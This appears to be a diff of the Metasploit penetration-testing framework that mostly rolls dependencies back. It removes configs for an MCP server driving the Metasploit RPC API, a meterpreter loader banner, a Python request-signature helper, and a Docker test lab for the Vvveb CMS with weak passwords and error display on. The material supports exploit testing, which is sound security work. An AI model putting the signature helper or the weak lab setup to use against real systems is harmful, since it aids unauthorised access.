+    logger (1.6.6)
    logging (2.4.0)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
@@ -330,8 +317,6 @@ GEM
      crass (~> 1.0.2)
      nokogiri (>= 1.12.0)
    lru_redux (1.1.0)
-    mcp (0.13.0)
-      json-schema (>= 4.1)
    memory_profiler (1.1.0)
    metasm (1.0.5)
    metasploit-concern (5.0.5)
@@ -341,7 +326,7 @@ GEM
      mutex_m
      railties (~> 7.0)
      zeitwerk
-    metasploit-credential (6.0.23)
+    metasploit-credential (6.0.16)
      bigdecimal
      csv
      drb
@@ -354,7 +339,7 @@ GEM
      railties
      rex-socket
      rubyntlm
-      rubyzip (< 3.0.0)
+      rubyzip
    metasploit-model (5.0.4)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
@@ -362,30 +347,26 @@ GEM
      drb
      mutex_m
      railties (~> 7.0)
-    metasploit-payloads (2.0.245)
-    metasploit_data_models (6.0.18)
-      activerecord (>= 7.0, < 8.1)
-      activesupport (>= 7.0, < 8.1)
+    metasploit-payloads (2.0.221)
+    metasploit_data_models (6.0.9)
+      activerecord (~> 7.0)
+      activesupport (~> 7.0)
      arel-helpers
-      bigdecimal
-      drb
      metasploit-concern
-      metasploit-model (>= 5.0.4)
-      mutex_m
+      metasploit-model (>= 3.1)
      pg
-      railties (>= 7.0, < 8.1)
+      railties (~> 7.0)
      recog
      webrick
-    metasploit_payloads-mettle (1.0.46)
+    metasploit_payloads-mettle (1.0.42)
    method_source (1.1.0)
-    mime-types (3.7.0)
+    mime-types (3.6.0)
      logger
-      mime-types-data (~> 3.2025, >= 3.2025.0507)
-    mime-types-data (3.2025.0924)
+      mime-types-data (~> 3.2015)
+    mime-types-data (3.2025.0304)
    mini_portile2 (2.8.9)
    minitest (5.25.5)
-    mqtt (0.7.0)
-      logger
+    mqtt (0.6.0)
    msgpack (1.6.1)
    multi_json (1.15.0)
    mustermann (3.0.3)
@@ -403,16 +384,15 @@ GEM
    net-smtp (0.5.1)
      net-protocol
    net-ssh (7.3.0)
-    netrc (0.11.0)
    network_interface (0.0.4)
    nexpose (7.3.0)
    nio4r (2.7.4)
-    nokogiri (1.18.10)
+    nokogiri (1.18.9)
      mini_portile2 (~> 2.8.2)
      racc (~> 1.4)
    nori (2.7.1)
      bigdecimal
-    octokit (10.0.0)
+    octokit (4.25.1)
      faraday (>= 1, < 3)
      sawyer (~> 0.9)
    openssl-ccm (1.2.3)
@@ -422,7 +402,7 @@ GEM
    packetfu (2.0.0)
      pcaprub (~> 0.13.1)
    parallel (1.27.0)
-    parser (3.3.9.0)
+    parser (3.3.8.0)
      ast (~> 2.4.1)
      racc
    parslet (1.8.2)
@@ -435,24 +415,24 @@ GEM
      ruby-rc4
      ttfunk
    pg (1.5.9)
-    pp (0.6.3)
+    pp (0.6.2)
      prettyprint
    prettyprint (0.2.0)
-    prism (1.5.1)
-    pry (0.15.2)
+    prism (1.4.0)
+    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
-    pry-byebug (3.11.0)
-      byebug (~> 12.0)
-      pry (>= 0.13, < 0.16)
+    pry-byebug (3.10.1)
+      byebug (~> 11.0)
+      pry (>= 0.13, < 0.15)
    psych (5.2.6)
      date
      stringio
-    public_suffix (6.0.2)
+    public_suffix (6.0.1)
    puma (6.6.0)
      nio4r (~> 2.0)
    racc (1.8.1)
-    rack (2.2.19)
+    rack (2.2.17)
    rack-protection (3.2.0)
      base64 (>= 0.1.0)
      rack (~> 2.2, >= 2.2.4)
@@ -470,9 +450,9 @@ GEM
    rails-html-sanitizer (1.6.2)
      loofah (~> 2.21)
      nokogiri (>= 1.15.7, != 1.16.7, != 1.16.6, != 1.16.5, != 1.16.4, != 1.16.3, != 1.16.2, != 1.16.1, != 1.16.0.rc1, != 1.16.0)
-    railties (7.2.2.2)
-      actionpack (= 7.2.2.2)
-      activesupport (= 7.2.2.2)
+    railties (7.2.2.1)
+      actionpack (= 7.2.2.1)
+      activesupport (= 7.2.2.1)
      irb (~> 1.13)
      rackup (>= 1.0.0)
      rake (>= 12.2)
@@ -483,40 +463,32 @@ GEM
    rasn1 (0.14.0)
      strptime (~> 0.2.5)
    rb-readline (0.5.5)
-    rdoc (6.15.0)
+    rdoc (6.14.2)
      erb
      psych (>= 4.0.0)
-      tsort
    recog (3.1.14)
      nokogiri
    redcarpet (3.6.1)
-    regexp_parser (2.11.3)
+    regexp_parser (2.10.0)
    reline (0.6.2)
      io-console (~> 0.5)
    require_all (3.0.0)
-    rest-client (2.1.0)
-      http-accept (>= 1.7.0, < 2.0)
-      http-cookie (>= 1.0.2, < 2.0)
-      mime-types (>= 1.16, < 4.0)
-      netrc (~> 0.8)
-    rex-arch (0.1.20)
+    rex-arch (0.1.18)
      rex-text
-    rex-bin_tools (0.1.16)
+    rex-bin_tools (0.1.10)
      metasm
      rex-arch
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.36)
-    rex-encoder (0.1.10)
+    rex-core (0.1.34)
+    rex-encoder (0.1.8)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.44)
-      bigdecimal
+    rex-exploitation (0.1.41)
      jsobfu
      metasm
-      racc
      rex-arch
      rex-encoder
      rex-text
@@ -528,12 +500,11 @@ GEM
      rex-arch
    rex-ole (0.1.9)
      rex-text
-    rex-powershell (0.1.103)
-      bigdecimal
+    rex-powershell (0.1.101)
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.21)
+    rex-random_identifier (0.1.16)
      bigdecimal
      rex-text
    rex-registry (0.1.6)
@@ -541,7 +512,7 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.65)
+    rex-socket (0.1.62)
      dnsruby
      rex-core
    rex-sslscan (0.1.13)
@@ -549,7 +520,7 @@ GEM
      rex-socket
      rex-text
    rex-struct2 (0.1.5)
-    rex-text (0.2.63)
+    rex-text (0.2.61)
      bigdecimal
    rex-zip (0.1.6)
      rex-text
@@ -559,7 +530,7 @@ GEM
      forwardable
      ipaddr
    rkelly-remix (0.0.7)
-    rspec (3.13.1)
+    rspec (3.13.0)
      rspec-core (~> 3.13.0)
      rspec-expectations (~> 3.13.0)
      rspec-mocks (~> 3.13.0)
@@ -571,7 +542,7 @@ GEM
    rspec-mocks (3.13.5)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.13.0)
-    rspec-rails (8.0.2)
+    rspec-rails (8.0.1)
      actionpack (>= 7.2)
      activesupport (>= 7.2)
      railties (>= 7.2)
@@ -581,7 +552,7 @@ GEM
      rspec-support (~> 3.13)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.13.6)
+    rspec-support (3.13.4)
    rubocop (1.75.7)
      json (~> 2.3)
      language_server-protocol (~> 3.17.0.2)
@@ -593,7 +564,7 @@ GEM
      rubocop-ast (>= 1.44.0, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 2.4.0, < 4.0)
-    rubocop-ast (1.47.1)
+    rubocop-ast (1.44.1)
      parser (>= 3.3.7.2)
      prism (~> 1.4)
    ruby-macho (4.1.0)
@@ -603,7 +574,7 @@ GEM
    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.3.17)
+    ruby_smb (3.3.15)
      bindata (= 2.4.15)
      openssl-ccm
      openssl-cmac
@@ -645,24 +616,19 @@ GEM
    timeout (0.4.3)
    toml (0.2.0)
      parslet (~> 1.8.0)
-    tsort (0.2.0)
    ttfunk (1.8.0)
      bigdecimal (~> 3.1)
    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
    tzinfo-data (1.2025.1)
      tzinfo (>= 1.0.0)
-    unicode-display_width (3.2.0)
-      unicode-emoji (~> 4.1)
-    unicode-emoji (4.1.0)
+    unicode-display_width (3.1.4)
+      unicode-emoji (~> 4.0, >= 4.0.4)
+    unicode-emoji (4.0.4)
    unix-crypt (1.3.1)
    useragent (0.16.11)
    warden (1.2.9)
      rack (>= 2.0.9)
-    webmock (3.26.2)
-      addressable (>= 2.8.0)
-      crack (>= 0.3.2)
-      hashdiff (>= 0.4.0, < 2.0.0)
    webrick (1.9.1)
    websocket-driver (0.7.7)
      base64
@@ -713,8 +679,7 @@ DEPENDENCIES
  simplecov (= 0.18.2)
  test-prof
  timecop
-  webmock (~> 3.18)
  yard

 BUNDLED WITH
-   2.5.22
+   2.5.10
@@ -2,7 +2,7 @@ Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: https://www.metasploit.com/

 Files: *
-Copyright: 2006-2026, Rapid7, Inc.
+Copyright: 2006-2025, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -2,15 +2,15 @@ This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 2.0.1, MIT
 aarch64, 2.1.0, "Apache 2.0"
 abbrev, 0.1.2, "ruby, Simplified BSD"
-actionpack, 7.2.2.2, MIT
-actionview, 7.2.2.2, MIT
-activemodel, 7.2.2.2, MIT
-activerecord, 7.2.2.2, MIT
-activesupport, 7.2.2.2, MIT
+actionpack, 7.2.2.1, MIT
+actionview, 7.2.2.1, MIT
+activemodel, 7.2.2.1, MIT
+activerecord, 7.2.2.1, MIT
+activesupport, 7.2.2.1, MIT
 addressable, 2.8.7, "Apache 2.0"
 afm, 0.2.2, MIT
-allure-rspec, 2.27.0, "Apache 2.0"
-allure-ruby-commons, 2.27.0, "Apache 2.0"
+allure-rspec, 2.26.0, "Apache 2.0"
+allure-ruby-commons, 2.26.0, "Apache 2.0"
 arel-helpers, 2.16.0, MIT
 ast, 2.4.3, MIT
 aws-eventstream, 1.3.2, "Apache 2.0"
@@ -23,42 +23,41 @@ aws-sdk-kms, 1.99.0, "Apache 2.0"
 aws-sdk-s3, 1.182.0, "Apache 2.0"
 aws-sdk-ssm, 1.191.0, "Apache 2.0"
 aws-sigv4, 1.11.0, "Apache 2.0"
-base64, 0.3.0, "ruby, Simplified BSD"
+base64, 0.2.0, "ruby, Simplified BSD"
 bcrypt, 3.1.20, MIT
 bcrypt_pbkdf, 1.1.1, MIT
 benchmark, 0.4.1, "ruby, Simplified BSD"
-bigdecimal, 3.3.1, "ruby, Simplified BSD"
+bigdecimal, 3.2.2, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
 bootsnap, 1.18.4, MIT
-bson, 5.1.1, "Apache 2.0"
+bson, 5.0.2, "Apache 2.0"
 builder, 3.3.0, MIT
-bundler, 2.5.22, MIT
-byebug, 12.0.0, "Simplified BSD"
+bundler, 2.5.10, MIT
+byebug, 11.1.3, "Simplified BSD"
 chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
 concurrent-ruby, 1.3.5, MIT
-connection_pool, 2.5.4, MIT
+connection_pool, 2.5.3, MIT
 cookiejar, 0.3.4, "Simplified BSD"
-crack, 1.0.1, MIT
 crass, 1.0.6, MIT
 csv, 3.3.2, "ruby, Simplified BSD"
 daemons, 1.4.1, MIT
 date, 3.4.1, "ruby, Simplified BSD"
-debug, 1.11.0, "ruby, Simplified BSD"
+debug, 1.10.0, "ruby, Simplified BSD"
 diff-lcs, 1.6.2, "MIT, Artistic-1.0-Perl, GPL-2.0-or-later"
-dnsruby, 1.73.1, "Apache 2.0"
+dnsruby, 1.72.4, "Apache 2.0"
 docile, 1.4.1, MIT
 domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
 drb, 2.2.3, "ruby, Simplified BSD"
-ed25519, 1.4.0, MIT
+ed25519, 1.3.0, MIT
 elftools, 1.3.1, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.3, MIT
-erb, 5.0.3, "ruby, Simplified BSD"
+erb, 5.0.2, "ruby, Simplified BSD"
 erubi, 1.13.1, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 6.5.5, MIT
-factory_bot_rails, 6.5.1, MIT
+factory_bot, 6.5.4, MIT
+factory_bot_rails, 6.5.0, MIT
 faker, 3.5.1, MIT
 faraday, 2.7.11, MIT
 faraday-net_http, 3.0.2, MIT
@@ -72,11 +71,9 @@ forwardable, 1.3.3, "ruby, Simplified BSD"
 getoptlong, 0.2.1, "ruby, Simplified BSD"
 gssapi, 1.3.1, MIT
 gyoku, 1.4.0, MIT
-hashdiff, 1.2.1, MIT
 hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.4.2, "Apache 2.0"
 hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
-http-accept, 1.7.0, MIT
 http-cookie, 1.0.8, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.9.0, ruby
@@ -86,32 +83,30 @@ ipaddr, 1.2.7, "ruby, Simplified BSD"
 irb, 1.15.2, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.15.1, ruby
-json-schema, 6.2.0, MIT
+json, 2.10.2, ruby
 language_server-protocol, 3.17.0.5, MIT
 license_finder, 5.11.1, MIT
 lint_roller, 1.1.0, MIT
 little-plugger, 1.1.4, MIT
-logger, 1.7.0, "ruby, Simplified BSD"
+logger, 1.6.6, "ruby, Simplified BSD"
 logging, 2.4.0, MIT
 loofah, 2.24.1, MIT
 lru_redux, 1.1.0, MIT
-mcp, 0.13.0, "Apache 2.0"
 memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.5, "New BSD"
-metasploit-credential, 6.0.23, "New BSD"
-metasploit-framework, 6.4.133, "New BSD"
+metasploit-credential, 6.0.16, "New BSD"
+metasploit-framework, 6.4.79, "New BSD"
 metasploit-model, 5.0.4, "New BSD"
-metasploit-payloads, 2.0.245, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 6.0.18, "New BSD"
-metasploit_payloads-mettle, 1.0.46, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.221, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 6.0.9, "New BSD"
+metasploit_payloads-mettle, 1.0.42, "3-clause (or ""modified"") BSD"
 method_source, 1.1.0, MIT
-mime-types, 3.7.0, MIT
-mime-types-data, 3.2025.0924, MIT
+mime-types, 3.6.0, MIT
+mime-types-data, 3.2025.0304, MIT
 mini_portile2, 2.8.9, MIT
 minitest, 5.25.5, MIT
-mqtt, 0.7.0, MIT
+mqtt, 0.6.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
 mustermann, 3.0.3, MIT
@@ -123,90 +118,88 @@ net-protocol, 0.2.2, "ruby, Simplified BSD"
 net-sftp, 4.0.0, MIT
 net-smtp, 0.5.1, "ruby, Simplified BSD"
 net-ssh, 7.3.0, MIT
-netrc, 0.11.0, MIT
 network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.7.4, "MIT, Simplified BSD"
-nokogiri, 1.18.10, MIT
+nokogiri, 1.18.9, MIT
 nori, 2.7.1, MIT
-octokit, 10.0.0, MIT
+octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
 openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 ostruct, 0.6.1, "ruby, Simplified BSD"
 packetfu, 2.0.0, "New BSD"
 parallel, 1.27.0, MIT
-parser, 3.3.9.0, MIT
+parser, 3.3.8.0, MIT
 parslet, 1.8.2, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.3, LGPL-2.1
 pdf-reader, 2.14.1, MIT
 pg, 1.5.9, "Simplified BSD"
-pp, 0.6.3, "ruby, Simplified BSD"
+pp, 0.6.2, "ruby, Simplified BSD"
 prettyprint, 0.2.0, "ruby, Simplified BSD"
-prism, 1.5.1, MIT
-pry, 0.15.2, MIT
-pry-byebug, 3.11.0, MIT
+prism, 1.4.0, MIT
+pry, 0.14.2, MIT
+pry-byebug, 3.10.1, MIT
 psych, 5.2.6, MIT
-public_suffix, 6.0.2, MIT
+public_suffix, 6.0.1, MIT
 puma, 6.6.0, "New BSD"
 racc, 1.8.1, "ruby, Simplified BSD"
-rack, 2.2.19, MIT
+rack, 2.2.17, MIT
 rack-protection, 3.2.0, MIT
 rack-session, 1.0.2, MIT
 rack-test, 2.2.0, MIT
 rackup, 1.0.1, MIT
 rails-dom-testing, 2.3.0, MIT
 rails-html-sanitizer, 1.6.2, MIT
-railties, 7.2.2.2, MIT
+railties, 7.2.2.1, MIT
 rainbow, 3.1.1, MIT
 rake, 13.3.0, MIT
 rasn1, 0.14.0, MIT
 rb-readline, 0.5.5, BSD
-rdoc, 6.15.0, ruby
+rdoc, 6.14.2, ruby
 recog, 3.1.14, unknown
 redcarpet, 3.6.1, MIT
-regexp_parser, 2.11.3, MIT
+regexp_parser, 2.10.0, MIT
 reline, 0.6.2, ruby
 require_all, 3.0.0, MIT
-rest-client, 2.1.0, MIT
-rex-arch, 0.1.20, "New BSD"
-rex-bin_tools, 0.1.16, "New BSD"
-rex-core, 0.1.36, "New BSD"
-rex-encoder, 0.1.10, "New BSD"
-rex-exploitation, 0.1.44, "New BSD"
+rex-arch, 0.1.18, "New BSD"
+rex-bin_tools, 0.1.10, "New BSD"
+rex-core, 0.1.34, "New BSD"
+rex-encoder, 0.1.8, "New BSD"
+rex-exploitation, 0.1.41, "New BSD"
 rex-java, 0.1.8, "New BSD"
 rex-mime, 0.1.11, "New BSD"
 rex-nop, 0.1.4, "New BSD"
 rex-ole, 0.1.9, "New BSD"
-rex-powershell, 0.1.103, "New BSD"
-rex-random_identifier, 0.1.21, "New BSD"
+rex-powershell, 0.1.101, "New BSD"
+rex-random_identifier, 0.1.16, "New BSD"
 rex-registry, 0.1.6, "New BSD"
 rex-rop_builder, 0.1.6, "New BSD"
-rex-socket, 0.1.65, "New BSD"
+rex-socket, 0.1.62, "New BSD"
 rex-sslscan, 0.1.13, "New BSD"
 rex-struct2, 0.1.5, "New BSD"
-rex-text, 0.2.63, "New BSD"
+rex-text, 0.2.61, "New BSD"
 rex-zip, 0.1.6, "New BSD"
 rexml, 3.4.1, "Simplified BSD"
 rinda, 0.2.0, "ruby, Simplified BSD"
 rkelly-remix, 0.0.7, MIT
-rspec, 3.13.1, MIT
+rspec, 3.13.0, MIT
 rspec-core, 3.13.5, MIT
 rspec-expectations, 3.13.5, MIT
 rspec-mocks, 3.13.5, MIT
-rspec-rails, 8.0.2, MIT
+rspec-rails, 8.0.1, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.13.6, MIT
+rspec-support, 3.13.4, MIT
 rubocop, 1.75.7, MIT
-rubocop-ast, 1.47.1, MIT
+rubocop-ast, 1.44.1, MIT
 ruby-macho, 4.1.0, MIT
 ruby-mysql, 4.2.0, MIT
 ruby-prof, 1.7.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.3.17, "New BSD"
+ruby_smb, 3.3.15, "New BSD"
 rubyntlm, 0.6.5, MIT
 rubyzip, 2.4.1, "Simplified BSD"
 sawyer, 0.9.2, MIT
@@ -228,16 +221,14 @@ tilt, 2.6.0, MIT
 timecop, 0.9.10, MIT
 timeout, 0.4.3, "ruby, Simplified BSD"
 toml, 0.2.0, MIT
-tsort, 0.2.0, "ruby, Simplified BSD"
 ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
 tzinfo, 2.0.6, MIT
 tzinfo-data, 1.2025.1, MIT
-unicode-display_width, 3.2.0, MIT
-unicode-emoji, 4.1.0, MIT
+unicode-display_width, 3.1.4, MIT
+unicode-emoji, 4.0.4, MIT
 unix-crypt, 1.3.1, 0BSD
 useragent, 0.16.11, MIT
 warden, 1.2.9, MIT
-webmock, 3.26.2, MIT
 webrick, 1.9.1, "ruby, Simplified BSD"
 websocket-driver, 0.7.7, "Apache 2.0"
 websocket-extensions, 0.1.5, "Apache 2.0"
@@ -18,14 +18,7 @@ Submit bugs and feature requests via the [GitHub Issues](https://github.com/rapi
 For information on writing modules, refer to the [API Documentation](https://docs.metasploit.com/api/).

 ## Support and Communication
-For questions and suggestions, you can:
-
- Join our [GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions) for community support and general questions
- Join the [Metasploit Slack](https://join.slack.com/t/metasploit/shared_invite/zt-30i688it0-mJsFGT44IMtdeZi1DraamQ) for real-time chat
- Submit [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues) for bug reports and feature requests
- Follow [@metasploit](https://x.com/metasploit) on X or [@metasploit@infosec.exchange](https://infosec.exchange/@metasploit) on Mastodon for updates
-
-**Note:** Some community members may still use IRC channels and the metasploit-hackers mailing list, though the primary support channels are now GitHub Discussions and Slack.
+For questions and suggestions, join the Freenode IRC channel or contact the metasploit-hackers mailing list.

 ## Installing Metasploit

@@ -4,26 +4,6 @@ Fiddle.const_set(:VERSION, '0.0.0') unless Fiddle.const_defined?(:VERSION)
 require 'rails'
 require File.expand_path('../boot', __FILE__)

-require 'action_view'
-# Monkey patch https://github.com/rails/rails/blob/v7.2.2.1/actionview/lib/action_view/helpers/tag_helper.rb#L51
-# Might be fixed by 8.x https://github.com/rails/rails/blob/v8.0.2/actionview/lib/action_view/helpers/tag_helper.rb#L51C1-L52C1
-raise unless ActionView::VERSION::STRING == '7.2.2.2' # A developer will need to ensure this is still required when bumping rails
-module ActionView::Helpers::TagHelper
-  class TagBuilder
-    def self.define_element(name, code_generator:, method_name: name.to_s.underscore)
-      code_generator.define_cached_method(method_name, namespace: :tag_builder) do |batch|
-        # Fixing a bug introduced by Metasploit's global Kernel patch: https://github.com/rapid7/metasploit-framework/blob/ae1db09f32cd04c007dbf445cf16dc22c9fc2e53/lib/rex.rb#L74-L79
-        # which fails when using the below 'instance_methods.include?(method_name.to_sym)' check
-        batch.push(<<~RUBY) # unless instance_methods.include?(method_name.to_sym)
-              def #{method_name}(content = nil, escape: true, **options, &block)
-                tag_string("#{name}", content, options, escape: escape, &block)
-              end
-            RUBY
-      end
-    end
-  end
-end
-
 all_environments = [
    :development,
    :production,
@@ -1,33 +0,0 @@
-# Metasploit RPC API connection (MessagePack)
-msf_api:
-  type: messagepack
-  host: localhost
-  port: 55553
-  ssl: true
-  endpoint: /api/
-  user: msfuser
-  password: CHANGEME
-  auto_start_rpc: true  # Automatically start the RPC server if not running (default: true)
-
-# MCP server configuration
-mcp:
-  transport: stdio  # stdio (default) or http
-  # MCP server network configuration (for HTTP transport only)
-  host: localhost  # Host to bind to (default: localhost)
-  port: 3000       # Port to listen on (default: 3000)
-
-# Rate limiting (optional - defaults shown)
-rate_limit:
-  enabled: true
-  requests_per_minute: 60
-  # If the `burst_size` is greater than `requests_per_minute`, a user will be allowed to exceed the rate limit temporarily.
-  # For example, with `requests_per_minute=5` and `burst_size=10`, a user could make 10 requests in a short period,
-  # but then would be limited to 5 requests per minute thereafter.
-  burst_size: 10
-
-# Logging (optional - defaults shown)
-logging:
-  enabled: false
-  level: INFO  # DEBUG, INFO, WARN, ERROR
-  log_file: ~/.msf4/logs/msfmcp.log
-  sanitize: true
@@ -1,32 +0,0 @@
-# Metasploit RPC API connection (JSON-RPC)
-msf_api:
-  type: json-rpc
-  host: localhost
-  port: 8081
-  ssl: true
-  endpoint: /api/v1/json-rpc
-  token: YOUR_BEARER_TOKEN_HERE
-  # auto_start_rpc is not supported for JSON-RPC (only MessagePack)
-
-# MCP server configuration
-mcp:
-  transport: stdio  # stdio (default) or http
-  # MCP server network configuration (for HTTP transport only)
-  host: localhost  # Host to bind to (default: localhost)
-  port: 3000       # Port to listen on (default: 3000)
-
-# Rate limiting (optional - defaults shown)
-rate_limit:
-  enabled: true
-  requests_per_minute: 60
-  # If the `burst_size` is greater than `requests_per_minute`, a user will be allowed to exceed the rate limit temporarily.
-  # For example, with `requests_per_minute=5` and `burst_size=10`, a user could make 10 requests in a short period,
-  # but then would be limited to 5 requests per minute thereafter.
-  burst_size: 10
-
-# Logging (optional - defaults shown)
-logging:
-  enabled: false
-  level: INFO  # DEBUG, INFO, WARN, ERROR
-  log_file: ~/.msf4/logs/msfmcp.log
-  sanitize: true
@@ -1,11 +0,0 @@
-meterpreter
-    ▄▄▄▄    ▒█████    █████▒
-    ▓█████▄ ▒██▒  ██▒▓██   ▒
-    ▒██▒ ▄██▒██░  ██▒▒████ ░
-    ▒██░█▀  ▒██   ██░░▓█▒  ░
-    ░▓█  ▀█▓░ ████▓▒░░▒█░
-    ░▒▓███▀▒░ ▒░▒░▒░  ▒ ░
-    ▒░▒   ░   ░ ▒ ▒░  ░     ~ by @kev169, @GuhnooPluxLinux, @R0wdyJoe, @skylerknecht ~
-    ░    ░ ░ ░ ░ ▒   ░ ░
-    ░          ░ ░  loader
-        ░
@@ -1,88 +0,0 @@
-import hashlib
-import re
-import argparse
-import sys
-from urllib.parse import urlsplit, parse_qs, unquote, quote
-from typing import Dict, List, Tuple
-
-_SIGNATURE_REGEX = re.compile(r'[^A-Za-z0-9/?_.=&{}\[\]":, -]')
-
-def compute_signature(method: str, path: str, body: str = '', key: str = '') -> str:
-    if not method or not path:
-        raise ValueError("Method and path must be provided.")
-
-    url_parts = urlsplit(path)
-    base_path = url_parts.path
-    
-    if not base_path.startswith('/'):
-        base_path = '/' + base_path
-    
-    raw_query_params: Dict[str, List[str]] = parse_qs(
-        url_parts.query, keep_blank_values=True, strict_parsing=False
-    )
-    
-    canonical_query: List[Tuple[str, str]] = []
-    for k, v_list in raw_query_params.items():
-        if k == '_signature':
-            continue
-            
-        value = unquote(v_list[0]) if v_list else ''
-        canonical_query.append((k, value))
-    
-    canonical_query.sort(key=lambda item: item[0])
-    
-    query_string = '&'.join(f"{k}={quote(v)}" for k, v in canonical_query)
-
-    if query_string:
-        canonical_path = f"{base_path}?{query_string}"
-    else:
-        canonical_path = base_path
-        
-    canonical_path = re.sub(_SIGNATURE_REGEX, '-', canonical_path)
-
-    body_for_signing = re.sub(_SIGNATURE_REGEX, '-', body)
-    
-    if not key:
-        password_hash = "da39a3ee5e6b4b0d3255bfef95601890afd80709"
-    else:
-        password_hash = hashlib.sha1(key.encode('utf-8')).hexdigest().lower()
-
-    data = f"{method.upper()}:{canonical_path}:{body_for_signing}:{password_hash}"
-    
-    return hashlib.sha1(data.encode('utf-8')).hexdigest().lower()
-
-def main():
-    parser = argparse.ArgumentParser(description="Computes a SHA1 signature for an HTTP request.")
-
-    parser.add_argument('--method', type=str, required=True,
-                        choices=['GET', 'POST', 'PUT', 'DELETE'],
-                        help="The HTTP method (e.g., GET).")
-    parser.add_argument('--path', type=str, required=True,
-                        help="The canonical path (e.g., /api/resource?param=value).")
-    parser.add_argument('--key', type=str, default='',
-                        help="The secret key. Defaults to an empty string.")
-    parser.add_argument('--body', type=str, default='',
-                        help="The request body as a string. Defaults to an empty string.")
-
-    try:
-        args = parser.parse_args()
-        
-        signature = compute_signature(
-            method=args.method,
-            path=args.path,
-            body=args.body,
-            key=args.key
-        )
-
-        print(f"Computed Signature: {signature}")
-
-    except ValueError as e:
-        sys.stderr.write(f"Error: {e}\n")
-        sys.exit(1)
-    except Exception as e:
-        sys.stderr.write(f"An unexpected error occurred: {e}\n")
-        sys.exit(1)
-
-
-if __name__ == '__main__':
-    main()
@@ -1,25 +0,0 @@
-FROM php:8.3-fpm
-
-RUN apt-get clean && apt-get update && \
-    apt-get install -y \
-        wget unzip \
-        libicu-dev \
-        libfreetype6-dev \
-        libjpeg62-turbo-dev \
-        libxml2-dev \
-        libwebp-dev \
-        libpng-dev \
-        libzip-dev \
-        libonig-dev \
-        libcurl4-openssl-dev && \
-    docker-php-ext-configure gd --with-webp --with-jpeg && \
-    docker-php-ext-install -j$(nproc) gd xml dom curl mbstring intl gettext zip mysqli && \
-    pecl install apcu && docker-php-ext-enable apcu && \
-    rm -rf /var/lib/apt/lists/*
-
-WORKDIR /var/www/html
-
-RUN wget https://github.com/givanz/Vvveb/releases/download/1.0.5/latest.zip && \
-    unzip latest.zip && rm latest.zip
-
-COPY php.ini /usr/local/etc/php/php.ini
@@ -1,43 +0,0 @@
-services:
-  php:
-    build: .
-    container_name: vvveb-php
-    volumes:
-      - vvveb_html:/var/www/html
-    networks:
-      - vvveb-net
-
-  nginx:
-    image: nginx:stable
-    container_name: vvveb-nginx
-    ports:
-      - "8080:80"
-    volumes:
-      - ./nginx.conf:/etc/nginx/conf.d/default.conf
-      - vvveb_html:/var/www/html:ro
-    depends_on:
-      - php
-    networks:
-      - vvveb-net
-
-  mysql:
-    image: mysql:5.7
-    container_name: vvveb-mysql
-    restart: unless-stopped
-    environment:
-      MYSQL_ROOT_PASSWORD: root
-      MYSQL_DATABASE: vvveb
-      MYSQL_USER: vvveb
-      MYSQL_PASSWORD: vvveb
-    volumes:
-      - db_data:/var/lib/mysql
-    networks:
-      - vvveb-net
-
-networks:
-  vvveb-net:
-    driver: bridge
-
-volumes:
-  db_data:
-  vvveb_html:
@@ -1,21 +0,0 @@
-server {
-    listen 80;
-    server_name localhost;
-
-    root /var/www/html;
-    index index.php index.html;
-
-    location / {
-        try_files $uri $uri/ /index.php?$args;
-    }
-
-    location ~ \.php$ {
-        try_files $uri =404;
-        fastcgi_split_path_info ^(.+\.php)(/.+)$;
-        fastcgi_pass php:9000;
-        fastcgi_index index.php;
-        include fastcgi_params;
-        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
-        fastcgi_param PATH_INFO $fastcgi_path_info;
-    }
-}
@@ -1,5 +0,0 @@
-display_errors = On
-memory_limit = 512M
-upload_max_filesize = 64M
-post_max_size = 64M
-max_execution_time = 300
